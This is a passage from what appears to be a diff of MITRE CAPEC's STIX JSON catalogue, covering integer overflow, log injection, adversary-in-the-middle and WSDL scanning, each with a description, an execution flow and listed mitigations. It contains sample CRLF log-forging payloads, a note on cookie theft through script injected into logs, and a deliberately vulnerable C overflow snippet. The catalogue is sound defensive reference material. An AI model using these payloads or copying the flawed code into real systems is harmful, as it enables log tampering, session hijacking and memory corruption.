"http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-122", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-196", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/196.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Integer Overflows", + "external_id": "03", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Integer-Overflows" + }, + { + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Robert C. Seacord, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--05---22, National Institute of Standards and Technology (NIST)", + "external_id": "REF-547", + "source_name": "reference_from_CAPEC", + "url": "http://samate.nist.gov/SRD/view_testcase.php?tID=1511" + }, + { + "description": "Robert C. Seacord, Secure Coding in C and C++", + "external_id": "REF-548", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Forced Integer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1f3b920a-a706-494c-9486-69531a514912" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. See also: CVE-2007-1544", + "\n The following code illustrates an integer overflow. The declaration of total integer as \"unsigned short int\" assumes that the length of the first and second arguments fits in such an integer [REF-547], [REF-548].\n include include include \n int main (int argc, char *const *argv){if (argc !=3){printf(\"Usage: prog_name \\n\");exit(-1);\n }unsigned short int total;total = strlen(argv[1])+strlen(argv[2])+1;char * buff = (char *)malloc(total);strcpy(buff, argv[1]);strcpy(buff, argv[2]);\n }\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The first step is exploratory meaning the attacker looks for an integer variable that they can control.

Experiment

  1. The attacker finds an integer variable that they can write into or manipulate and try to get the value of the integer out of the possible range.

Exploit

  1. The integer variable is forced to have a value out of range which set its final value to an unexpected value.

  2. The target host acts on the data and unexpected behavior may happen.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker can manipulate the value of an integer variable utilized by the target host.", + "The target host does not do proper range checking on the variable before utilizing it.", + "When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number)" + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow an integer by inserting an out of range value." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8ed81c8-ed80-43a6-b0a2-c7ead943f317", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.", + "id": "course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-92-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3d51c21-4f4c-4136-b351-f5c1b935b7cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11", + "spec_version": "2.1", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d64dd927-79c3-45ef-948b-e86799536d9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always do bound checking before consuming user input data.", + "id": "course-of-action--875120c6-9f3e-4fed-88f3-1683f497e905", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-92-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--94ebd003-5a86-4654-a505-d70213867164", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--875120c6-9f3e-4fed-88f3-1683f497e905", + "spec_version": "2.1", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.", + "external_references": [ + { + "external_id": "CAPEC-93", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131", + "source_name": "reference_from_CAPEC" + }, + { + "description": "A. Muffet, The night the log was forged", + "external_id": "REF-550", + "source_name": "reference_from_CAPEC", + "url": "http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm" + }, + { + "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)", + "external_id": "REF-551", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Log_Injection" + }, + { + "description": "Fortify Software, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--06---22, National Institute of Standards and Technology (NIST)", + "external_id": "REF-552", + "source_name": "reference_from_CAPEC", + "url": "https://samate.nist.gov/SRD/view_testcase.php?tID=1579" + } + ], + "id": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Log Injection-Tampering-Forging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. See also: CVE-2006-0201", + "\n If a user submits the string \"twenty-one\" for val, the following entry is logged:\n INFO: Failed to parse val=twenty-one\n However, if an attacker submits the string\n twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\n the following entry is logged:\n INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy\n Clearly, attackers can use this same mechanism to insert arbitrary log entries.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application's Log File Format: The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.

    2. Techniques
    Determine logging utility being used by application (e.g. log4j)
    Gain access to application's source code to determine log file formats.
    Install or obtain access to instance of application and observe its log file format.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

    2. Techniques
    \n Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:\n \"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\"\n may add the following forged entry into a log file:\n \"[Thu Nov 12 12:11:22]:Info: User admin logged in\"\n Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain\n \n The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).\n
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host is logging the action and data of the user.", + "The target host insufficiently protects access to the logs or logging mechanisms." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.", + "Medium": "A more sophisticated attack can try to defeat the input validation mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully control access to physical log files.", + "id": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--902d0a46-bb02-4c00-9c12-63139df6d6ca", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow tainted data to be written in the log file without prior input validation. An allowlist may be used to properly validate the data.", + "id": "course-of-action--89cb136b-4f28-4cf2-a399-ea0e5451cdd1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--87217e96-f97b-4c88-8e77-1ff3c6f211f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89cb136b-4f28-4cf2-a399-ea0e5451cdd1", + "spec_version": "2.1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1004a1b-30e7-4057-b6bd-640ad3d2d21c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023", + "spec_version": "2.1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use static analysis tools to identify log forging vulnerabilities.", + "id": "course-of-action--4e06b58a-2a51-45d2-84ef-bedcbb654515", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65f16c8f-4535-4431-928b-ab9c8d336a93", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e06b58a-2a51-45d2-84ef-bedcbb654515", + "spec_version": "2.1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.", + "id": "course-of-action--7e6b79fb-dad6-48d5-8cf7-178e70577c8a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb05b9ba-1c0b-4cf6-a5cf-94af69a17b39", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e6b79fb-dad6-48d5-8cf7-178e70577c8a", + "spec_version": "2.1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.\n ", + "external_references": [ + { + "external_id": "CAPEC-94", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-593", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/593.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "description": "Adversary-in-the-Middle", + "external_id": "T1557", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557" + }, + { + "description": "Man-in-the-middle attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Man-in-the-middle_attack" + }, + { + "description": "M. Bishop, Computer Security: Art and Science, 2003, Addison-Wesley", + "external_id": "REF-553", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Man-in-the-middle attack, Open Web Application Security Project (OWASP)", + "external_id": "REF-633", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Man-in-the-middle_attack" + }, + { + "description": "Kyle Chivers, What is a man-in-the-middle attack?, 2020--03---26, NortonLifeLock Inc.", + "external_id": "REF-634", + "source_name": "reference_from_CAPEC", + "url": "https://us.norton.com/internetsecurity-wifi-what-is-a-man-in-the-middle-attack.html" + }, + { + "description": "Man in the middle (MITM) attack, Imperva", + "external_id": "REF-635", + "source_name": "reference_from_CAPEC", + "url": "https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/" + }, + { + "description": "Jerry Decime, Settling the score: taking down the Equifax mobile application, 2017--09---13", + "external_id": "REF-636", + "source_name": "reference_from_CAPEC", + "url": "https://www.linkedin.com/pulse/settling-score-taking-down-equifax-mobile-application-jerry-decime/" + } + ], + "id": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Adversary in the Middle (AiTM)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Man-in-the-Middle / MITM", + "Person-in-the-Middle / PiTM", + "Monkey-in-the-Middle", + "Monster-in-the-Middle", + "On-path Attacker" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n In 2017, security researcher Jerry Decime discovered that Equifax mobile applications were not leveraging HTTPS in all areas. Although authentication was properly utilizing HTTPS, in addition to validating the root of trust of the server certificate, other areas of the application were using HTTP to communicate. Adversaries could then conduct MITM attacks on rogue WiFi or cellular networks and hijack the UX. This further allowed the adversaries to prompt users for sensitive data, which could then be obtained in the plaintext response. [REF-636]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Communication Mechanism: The adversary determines the nature and mechanism of communication between two components, looking for opportunities to exploit.

    2. Techniques
    Perform a sniffing attack and observe communication to determine a communication protocol.
    Look for application documentation that might describe a communication mechanism used by a target.

Experiment

  1. Position In Between Targets: The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components.

    2. Techniques
    Install spyware on a client that will intercept outgoing packets and route them to their destination as well as route incoming packets back to the client.
    Exploit a weakness in an encrypted communication mechanism to gain access to traffic. Look for outdated mechanisms such as SSL.

Exploit

  1. Use Intercepted Data Maliciously: The adversary observes, filters, or alters passed data of its choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes.

    2. Techniques
    Prevent some messages from reaching their destination, causing a denial of service.
", + "x_capec_extended_description": "\n Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first flows through the adversary, who has the opportunity to observe or alter it, before being passed on to the intended recipient as if it was never observed. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for these attacks yields an implicit lack of trust in communication or identify between two components.\n These attacks differ from Sniffing Attacks (CAPEC-157) since these attacks often modify the communications prior to delivering it to the intended recipient.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a", + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea", + "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "attack-pattern--3491dd54-d586-4f3d-80c1-9576ee48236b" + ], + "x_capec_prerequisites": [ + "There are two components communicating with each other.", + "An attacker is able to identify the nature and mechanism of communication between the two target components.", + "An attacker can eavesdrop on the communication between the target components.", + "Strong mutual authentication is not used between the two target components yielding opportunity for attacker interposition.", + "The communication occurs in clear (not encrypted) or with insufficient and spoofable encryption." + ], + "x_capec_skills_required": { + "Medium": "This attack can get sophisticated since the attack may use cryptography." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure Public Keys are signed by a Certificate Authority", + "id": "course-of-action--7e959f1b-27b5-47ae-a7b5-4c2d7706b8f4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5264115d-5e8a-4dbd-95fe-60d77876319d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e959f1b-27b5-47ae-a7b5-4c2d7706b8f4", + "spec_version": "2.1", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt communications using cryptography (e.g., SSL/TLS)", + "id": "course-of-action--6b5dd988-67a1-4705-bdfb-a93f761103d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6822ab84-ff48-490b-8bff-9eb89ae991ba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6b5dd988-67a1-4705-bdfb-a93f761103d0", + "spec_version": "2.1", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use Strong mutual authentication to always fully authenticate both ends of any communications channel.", + "id": "course-of-action--667b8791-5eee-4dfc-86ae-fb68a7b5b8ca", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3043134e-bd5e-43ae-93a4-4f2f31bda6cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--667b8791-5eee-4dfc-86ae-fb68a7b5b8ca", + "spec_version": "2.1", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Exchange public keys using a secure channel", + "id": "course-of-action--45042a19-1cd7-40b5-a3bf-d96506a0cf28", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-94-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbfe5c41-f0ba-4524-aeaa-5d46d305a1a7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--45042a19-1cd7-40b5-a3bf-d96506a0cf28", + "spec_version": "2.1", + "target_ref": "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.", + "external_references": [ + { + "external_id": "CAPEC-95", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-538", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/538.html" + }, + { + "description": "Walid Negm, Anatomy of a Web Services Attack, 2004--03---01, ForumSystems", + "external_id": "REF-554", + "source_name": "reference_from_CAPEC", + "url": "https://www.forumsys.com/wp-content/uploads/2014/01/Anatomy-of-a-Web-Services-Attack.pdf" + }, + { + "description": "Frank Coyle, Seven Steps to XML Mastery, 2006--08---25", + "external_id": "REF-555", + "source_name": "reference_from_CAPEC", + "url": "http://www.informit.com/articles/article.aspx?p=601349" + } + ], + "id": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "modified": "2021-10-21T00:00:00.000Z", + "name": "WSDL Scanning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A WSDL interface may expose a function vulnerable to SQL Injection.", + "\n The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are 